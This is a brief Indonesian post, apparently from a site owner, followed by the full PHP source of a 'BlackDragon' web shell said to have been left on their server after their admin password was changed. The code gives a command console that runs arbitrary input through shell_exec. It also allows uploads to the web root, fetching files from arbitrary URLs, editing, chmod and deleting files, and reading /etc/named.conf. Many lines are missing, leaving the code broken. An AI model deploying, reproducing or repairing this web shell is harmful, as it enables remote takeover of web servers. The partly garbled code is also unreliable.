Assalamualaikum,.. ini isi file php yang disisakan saat merubah password admin saya
<?php null;
function flash($message, $status, $class, $redirect = false) {
if (!empty($_SESSION["message"])) { unset($_SESSION["message"]); }
if (!empty($_SESSION["class"])) { unset($_SESSION["class"]); }
if (!empty($_SESSION["status"])) { unset($_SESSION["status"]); }
$_SESSION["message"] = $message;
$_SESSION["class"] = $class;
$_SESSION["status"] = $status;
if ($redirect) {
header('Location: ' . $redirect); }
return true;
}
function clear() {
if (!empty($_SESSION["message"])) { unset($_SESSION["message"]); }
if (!empty($_SESSION["class"])) { unset($_SESSION["class"]); }
if (!empty($_SESSION["status"])) { unset($_SESSION["status"]); }
return true;
}
function writable($path, $perms){
return (!is_writable($path)) ?
"<font color=\"red\">".$perms."</font>" : "<font color=\"lime\">".$perms."</font>"; }
function perms($path) {
if (($perms & 0xC000) == 0xC000) {
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function fsize($file) {
$a = ["B", "KB", "MB", "GB", "TB", "PB"];
$pos = 0;
while ($size >= 1024) {
$size /= 1024;
$pos++;
}
return round($size, 2)." ".$a[$pos]; }
if (isset($_GET['dir'])) { $path = $_GET['dir'];
} else {
}
function getOwner($item) {
$downer = $downer['name'];
} else {
}
$dgrp = $dgrp['name'];
} else {
}
return $downer . '/' . $dgrp;
}
if (isset($_POST['newFolderName'])) { if (mkdir($path . '/' . $_POST['newFolderName'])) { flash("Create Folder Successfully!", "Success", "success", "?dir=$path");
} else {
flash("Create Folder Failed", "Failed", "error", "?dir=$path");
}
}
if (isset($_POST['newFileName']) && isset($_POST['newFileContent'])) { flash("Create File Successfully!", "Success", "success", "?dir=$path");
} else {
flash("Create File Failed", "Failed", "error", "?dir=$path");
}
}
if (isset($_POST['newName']) && isset($_GET['item'])) { if ($_POST['newName'] == '') {
flash("You miss an important value", "Ooopss..", "warning", "?dir=$path");
}
if (rename($path. '/'. $_GET['item'], $_POST['newName'])) { flash("Rename Successfully!", "Success", "success", "?dir=$path");
} else {
flash("Rename Failed", "Failed", "error", "?dir=$path");
}
}
if (isset($_POST['newContent']) && isset($_GET['item'])) { flash("Edit Successfully!", "Success", "success", "?dir=$path");
} else {
flash("Edit Failed", "Failed", "error", "?dir=$path");
}
}
if (isset($_POST['newPerm']) && isset($_GET['item'])) { if ($_POST['newPerm'] == '') {
flash("You miss an important value", "Ooopss..", "warning", "?dir=$path");
}
if (chmod($path. '/'. $_GET['item'], $_POST['newPerm'])) { flash("Change Permission Successfully!", "Success", "success", "?dir=$path");
} else {
flash("Change Permission", "Failed", "error", "?dir=$path");
}
}
if (isset($_GET['action']) && $_GET['action'] == 'delete' && isset($_GET['item'])) { if (rmdir($_GET['item'])) { flash("Delete Successfully!", "Success", "success", "?dir=$path");
} else {
flash("Delete Failed", "Failed", "error", "?dir=$path");
}
} else {
flash("Delete Successfully!", "Success", "success", "?dir=$path");
} else {
flash("Delete Failed", "Failed", "error", "?dir=$path");
}
}
}
if ($_POST['submit']) {
if ($_POST['upl'] == 'current') {
$total = count($_FILES['uploadfile']['name']); for ($i = 0; $i < $total; $i++) {
$mainupload = move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]); }
if ($total < 2) {
if ($mainupload) {
flash("Upload File Successfully! ", "Success", "success", "?dir=$path");
} else {
flash("Upload Failed", "Failed", "error", "?dir=$path");
}
} else {
if ($mainupload) {
flash("Upload $i Files Successfully! ", "Success", "success", "?dir=$path");
} else {
flash("Upload Failed", "Failed", "error", "?dir=$path");
}
}
} elseif ($_POST['upl'] == 'root') {
$total = count($_FILES['uploadfile']['name']); for ($i = 0; $i < $total; $i++) {
$mainupload = move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $_SERVER['DOCUMENT_ROOT']."/".$_FILES['uploadfile']['name'][$i]); }
if ($total < 2) {
if ($mainupload) {
flash("Upload File Successfully! ", "Success", "success", "?dir=$path");
} else {
flash("Upload Failed", "Failed", "error", "?dir=$path");
}
} else {
if ($mainupload) {
flash("Upload $i Files Successfully! ", "Success", "success", "?dir=$path");
} else {
flash("Upload Failed", "Failed", "error", "?dir=$path");
}
}
}
}
// Upload from URL
if (isset($_POST['url']) && isset($_POST['filename']) && isset($_POST['method'])) { $url = $_POST['url'];
$filename = $_POST['filename'];
$destination = $path . '/' . $filename;
switch ($_POST['method']) {
case 'file_get_contents':
if ($data !== false) {
flash("File uploaded successfully using file_get_contents!", "Success", "success", "?dir=$path");
} else {
flash("Failed to upload file using file_get_contents", "Failed", "error", "?dir=$path");
}
break;
case 'curl':
$fp = fopen($destination, 'wb'); flash
("Failed to upload file using cURL: " . curl_error($ch), "Failed", "error", "?dir=$path"); } else {
flash("File uploaded successfully using cURL!", "Success", "success", "?dir=$path");
}
break;
case 'fopen':
$stream = fopen($url, 'rb'); if ($stream) {
flash("File uploaded successfully using fopen!", "Success", "success", "?dir=$path");
} else {
flash("Failed to upload file using fopen", "Failed", "error", "?dir=$path");
}
break;
case 'copy':
if (copy($url, $destination)) { flash("File uploaded successfully using copy!", "Success", "success", "?dir=$path");
} else {
flash("Failed to upload file using copy", "Failed", "error", "?dir=$path");
}
break;
case 'stream_context':
if ($data !== false) {
flash("File uploaded successfully using stream_context!", "Success", "success", "?dir=$path");
} else {
flash("Failed to upload file using stream_context", "Failed", "error", "?dir=$path");
}
break;
}
}
$d0mains = @file("/etc/named.conf", false); if (!$d0mains){
$dom = "Cant read /etc/named.conf";
$GLOBALS["need_to_update_header"] = "true";
} else {
$count = 0;
foreach ($d0mains as $d0main){
if (@strstr($d0main, "zone")){ $count++;
}
}
}
$dom = "$count Domain";
}
$ip = !@$_SERVER['SERVER_ADDR'] ?
gethostbyname($_SERVER['SERVER_NAME']) : @$_SERVER['SERVER_ADDR']; $serv = $_SERVER['HTTP_HOST'];
$soft = $_SERVER['SERVER_SOFTWARE'];
?>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="robots" content="noindex, nofollow">
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
<link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"/>
<title><?= $serv; ?> - BlackDragon</title>
</head>
<body class="bg-dark text-light">
<div class="container-fluid">
<div class="py-3" id="main">
<div class="box shadow bg-dark p-4 rounded-3">
<div class="info mb-3">
<i class="fa fa-server"></i> <?= $uname; ?><br>
<i class="fa fa-microchip"></i> <?= $soft; ?><br>
<i class="fa fa-satellite-dish"></i> <?= $ip; ?><br>
<i class="fa fa-fingerprint"></i> <?= $dom; ?>
</div>
<div class="breadcrumb">
<i class="fa fa fa-folder pt-1"></i> <?php foreach ($exdir as $id => $pat) : if ($pat == '' && $id == 0):?>
<a href="?dir=/" class="text-decoration-none text-light">/</a>
<?php endif; if ($pat == '') continue; ?>
<a href="?dir=<?php for ($i = 0; $i <= $id; $i++) {echo "$exdir[$i]";if ($i != $id) echo "/";}?>" class="text-decoration-none text-light"><?= $pat ?></a><span class="text-light"> /</span>
<?php endforeach; ?>
[ <?php echo writable($path, perms($path)) ?> ]
<div class="row">
<a href="?" class="text-decoration-none text-light"> [ HOME ]</a>
</div>
</div>
<div class="d-flex justify-content-between">
<div class="p-2">
<form action="" method="post">
<label for="name" class="form-label">Console</label>
<div class="row">
<div class="col-md-9 mb-3">
<input type="text" class="form-control form-control-sm" name="bdcmd" placeholder="whoami">
</div>
<div class="col-md-3">
<button type="submit" class="btn btn-outline-light btn-sm">Submit</button>
</div>
</div>
</form>
</div>
<div class="p-2">
<form action="" method="post" enctype="multipart/form-data">
<input class="form-check-input" type="radio" id="flexRadioDefault1" name="upl" value="current" checked>
<label class="form-label">Current Dir </label>
<input class="form-check-input" type="radio" id="flexRadioDefault2" name="upl" value="root">
<label class="form-label">Root Dir</label>
<div class="row">
<div class="col-md-9 mb-3">
<input type="file" class="form-control form-control-sm" name="uploadfile[]" multiple id="inputGroupFile04" aria-describedby="inputGroupFileAddon04" aria-label="Upload">
</div>
<div class="col-md-3">
<input type='submit' class="btn btn-outline-light btn-sm" value='Submit' name='submit'>
</div>
</div>
</form>
</div>
</div>
<div class="container" id="tools">
<div class="collapse" id="uploadUrlCollapse" data-bs-parent="#tools" style="transition:none;">
<form action="" method="post">
<div class="mb-3">
<label for="url" class="form-label">URL to Upload</label>
<input type="text" class="form-control" name="url" placeholder="Enter URL here" required>
</div>
<div class="mb-3">
<label for="filename" class="form-label">File Name</label>
<input type="text" class="form-control" name="filename" placeholder="Enter file name" required>
</div>
<div class="mb-3">
<label for="method" class="form-label">Upload Method</label>
<select class="form-select" name="method" required>
<option value="file_get_contents">file_get_contents</option>
<option value="curl">cURL</option>
<option value="fopen">fopen</option>
<option value="copy">copy</option>
<option value="stream_context">stream_context</option>
</select>
</div>
<button type="submit" class="btn btn-outline-light">Upload</button>
</form>
</div>
<a data-bs-toggle="collapse" href="#uploadUrlCollapse" role="button" aria-expanded="false" aria-controls="uploadUrlCollapse" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-link"></i> Upload from URL</a>
<?php if (isset($_POST['bdcmd'])) : ?> <div class="p-2">
<div class="row justify-content-center">
<div class='card text-dark mb-3'>
<pre>
<?php echo $ip."@".$serv.": ~$ "; $cmd = $_POST['bdcmd']; echo $cmd."<br>";?><br><code>
<?php if(function_exists('shell_exec')){ echo shell_exec($cmd.' 2>&1'); } else { echo "Disable Function"; }?></code></pre>
</div>
</div>
</div>
<?php endif; ?>
<?php if (isset($_GET['action']) && $_GET['action'] != 'delete') : $action = $_GET['action'] ?> <div class="row justify-content-center">
<?php if ($action == 'rename' && isset($_GET['item'])) : ?> <form action="" method="post">
<div class="mb-3">
<label for="name" class="form-label">New Name</label>
<input type="text" class="form-control" name="newName" value="<?= $_GET['item'] ?>">
</div>
<button type="submit" class="btn btn-outline-light">Submit</button>
<button type="button" class="btn btn-outline-light" onclick="history.go(-1)">Back</button>
</form>
<?php elseif ($action == 'edit' && isset($_GET['item'])) : ?> <form action="" method="post">
<div class="mb-3">
<label for="name" class="form-label"><?= $_GET['item'] ?></label>
</div>
<button type="submit" class="btn btn-outline-light">Submit</button>
<button type="button" class="btn btn-outline-light" onclick="jscopy()">Copy</button>
<button type="button" class="btn btn-outline-light" onclick="history.go(-1)">Back</button>
</form>
<?php elseif ($action == 'view' && isset($_GET['item'])) : ?> <div class="mb-3">
<label for="name" class="form-label">File Name : <?= $_GET['item'] ?></label>
<br>
<button type="button" class="btn btn-outline-light" onclick="history.go(-1)">Back</button>
</div>
<?php elseif ($action == 'chmod' && isset($_GET['item'])) : ?> <form action="" method="post">
<div class="mb-3">
<label for="name" class="form-label"><?= $_GET['item'] ?></label>
<input type="text" class="form-control" name="newPerm" value="
<?= substr(sprintf('%o', fileperms($_GET['item'])), -4); ?>">
</div>
<button type="submit" class="btn btn-outline-light">Submit</button>
<button type="button" class="btn btn-outline-light" onclick="history.go(-1)">Back</button>
</form>
<?php endif; ?>
</div>
<?php endif; ?>
<div class="row justify-content-center">
<div class="collapse" id="newFolderCollapse" data-bs-parent="#tools" style="transition:none;">
<form action="" method="post">
<div class="mb-3">
<label for="name" class="form-label">Folder Name</label>
<input type="text" class="form-control" name="newFolderName" placeholder="BlackDragon">
</div>
<button type="submit" class="btn btn-outline-light">Submit</button>
</form>
</div>
<div class="collapse" id="newFileCollapse" data-bs-parent="#tools" style="transition:none;">
<form action="" method="post">
<div class="mb-3">
<label for="name" class="form-label">File Name</label>
<input type="text" class="form-control" name="newFileName" placeholder="blackdragon.php">
</div>
<div class="mb-3">
<label for="name" class="form-label">File Content</label>
<textarea name="newFileContent" rows="10" class="form-control" placeholder="Hello World - BlackDragon"></textarea>
</div>
<button type="submit" class="btn btn-outline-light">Submit</button>
</form>
</div>
</div>
</div>
<div class="table-responsive">
<table class="table table-hover table-dark text-light">
<thead>
<tr>
<td style="width:35%">Name</td>
<td style="width:10%">Type</td>
<td style="width:10%">Size</td>
<td style="width:13%">Owner/Group</td>
<td style="width:10%">Permission</td>
<td style="width:13%">Last Modified</td>
<td style="width:9%">Actions</td>
</tr>
</thead>
<tbody class="text-nowrap">
<?php
foreach ($dirs as $dir) :
?>
<tr>
<td>
<?php if ($dir === '..') : ?>
<a href="?dir=
<?= dirname($path); ?>" class="text-decoration-none text-light"><i class="fa fa-folder-open"></i>
<?= $dir ?></a>
<?php elseif ($dir === '.') : ?>
<a href="?dir=<?= $path; ?>" class="text-decoration-none text-light"><i class="fa fa-folder-open"></i> <?= $dir ?></a>
<?php else : ?>
<a href="?dir=<?= $path . '/' . $dir ?>" class="text-decoration-none text-light"><i class="fa fa-folder"></i> <?= $dir ?></a>
<?php endif; ?>
</td>
<td class="text-light">
<?= filetype($dir) ?></td>
<td class="text-light">-</td>
<td class="text-light"><?= getOwner($dir) ?></td>
<td class="text-light">
<?php
if(is_writable($path.'/'.$dir)) echo '<font color="lime">'; elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">'; echo perms($path.'/'.$dir);
?>
</td>
<td class="text-light">
<?= date("Y-m-d h:i:s", filemtime($dir)); ?></td>
<td>
<?php if ($dir != '.' && $dir != '..') : ?>
<div class="btn-group">
<a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=rename" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-edit"></i></a>
<a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=chmod" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-file-signature"></i></a>
<a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=<?= $path ?>&item=<?= $dir ?>&action=delete')"><i class="fa fa-trash"></i></a>
</div>
<?php elseif ($dir === '.') : ?>
<div class="btn-group">
<a data-bs-toggle="collapse" href="#newFolderCollapse" role="button" aria-expanded="false" aria-controls="newFolderCollapse" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-folder-plus"></i></a>
<a data-bs-toggle="collapse" href="#newFileCollapse" role="button" aria-expanded="false" aria-controls="newFileCollapse" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-file-plus"></i></a>
</div>
<?php endif; ?>
</td>
</tr>
<?php endforeach; ?>
<?php
foreach ($dirs as $dir) :
?>
<tr>
<td>
<a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=view" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> <?= $dir ?></a>
</td>
<td class="text-light"><?= fsize($dir) ?></td>
<td class="text-light"><?= getOwner($dir) ?></td>
<td class="text-light">
<?php
if(is_writable($path.'/'.$dir)) echo '<font color="lime">'; elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">'; echo perms($path.'/'.$dir);
?>
</td>
<td class="text-light">
<?= date("Y-m-d h:i:s", filemtime($dir)); ?></td>
<td>
<?php if ($dir != '.' && $dir != '..') : ?>
<div class="btn-group">
<a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=edit" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-file-edit"></i></a>
<a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=rename" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-edit"></i></a>
<a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=chmod" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-file-signature"></i></a>
<a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=<?= $path ?>&item=<?= $dir ?>&action=delete')"><i class="fa fa-trash"></i></a>
</div>
<?php endif; ?>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
</div>
<div class="text-light">© BlackDragon <script type='text/javascript'>var creditsyear = new Date();document.write(creditsyear.getFullYear());</script></div>
</div>
</div>
</div>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.4.0/dist/sweetalert2.all.min.js"></script>
<script>
<?php if (isset($_SESSION['message'])) : ?> Swal.fire(
'<?= $_SESSION['status'] ?>',
'<?= $_SESSION['message'] ?>',
'<?= $_SESSION['class'] ?>'
)
<?php endif; clear(); ?>
function deleteConfirm(url) {
event.preventDefault()
Swal.fire({
title: 'Are you sure?',
icon: 'warning',
showCancelButton: true,
confirmButtonColor: '#3085d6',
cancelButtonColor: '#d33',
confirmButtonText: 'Yes, delete it!'
}).then((result) => {
if (result.isConfirmed) {
window.location.href = url
}
})
}
function jscopy() {
var jsCopy = document.getElementById("CopyFromTextArea");
jsCopy.focus();
jsCopy.select();
document.execCommand("copy");
}
</script>
</body>
</html>
